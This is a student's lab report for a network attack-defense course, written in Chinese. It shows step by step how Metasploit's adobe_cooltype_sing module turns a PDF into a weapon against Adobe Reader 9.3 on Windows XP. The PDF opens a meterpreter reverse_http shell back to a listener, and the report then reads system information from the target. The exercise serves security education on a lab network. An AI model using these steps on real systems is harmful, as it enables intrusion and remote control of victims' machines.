20145335郝昊《网络攻防》Exp4 Adobe阅读器漏洞攻击
实验内容
-
初步掌握平台matesploit的使用
-
有了初步完成渗透操作的思路
-
本次攻击对象为:windows xp sp3 / Adobe 9.3
-
主机为kali的ip地址为:
192.168.199.220、靶机windows xp 的ip地址为:192.168.199.137
实验步骤
-
使用命令
msfconsole进入控制台 -
根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_cooltype_sing),可以使用info命令查看模块的基本信息,以及参数要求,使用命令为
use windows/fileformat/adobe_cooltype_sing进入攻击模块设置攻击载荷payloads ,命令为
set payloads windows/meterpreter/reverse_http之后使用命令
show options来确定需要修改的参数(截图省略)需要设置的参数有
LHOST、LPORT、FILENAME命令为
set LHOST 192.168.199.220 set LPORT 5335 set FILENAME 5335.pdf
- 使用命令
exploit生成5335.pdf
- 注意其生成路径,是一个隐藏文件夹,此时可以打开一个新的cmd,使用名命令
cp 5335.pdf /root/5335.pdf将其移动出来
- 之后退出并从新进入msf平台,使用命令
msfconsole
- 使用命令
use exploit/multi/handler进入监听模式,并设置好参数,确认无误后,执行exploit等待被攻击者的接听。
- 连接成功,使用命令
sysinfo可以轻而易举的获得靶机的信息
也可以使用ipconfig查看靶机信息
实验中遇到的问题
-
起初在kali中生成了5335.pdf后不知道如何将其传输到靶机中(后来采用ncat传过去的),其中采用过qq邮箱进行传输,但是遇到了一下问题
后来完成实验我在想,既然邮件能被查杀出来,难道不就说明腾讯能查看到我们的信息,有时候是个好事,利用云查杀解决一些不必要的烦恼,但是如果邮件中含有一些个人隐私信息呢,这是好事还是坏事。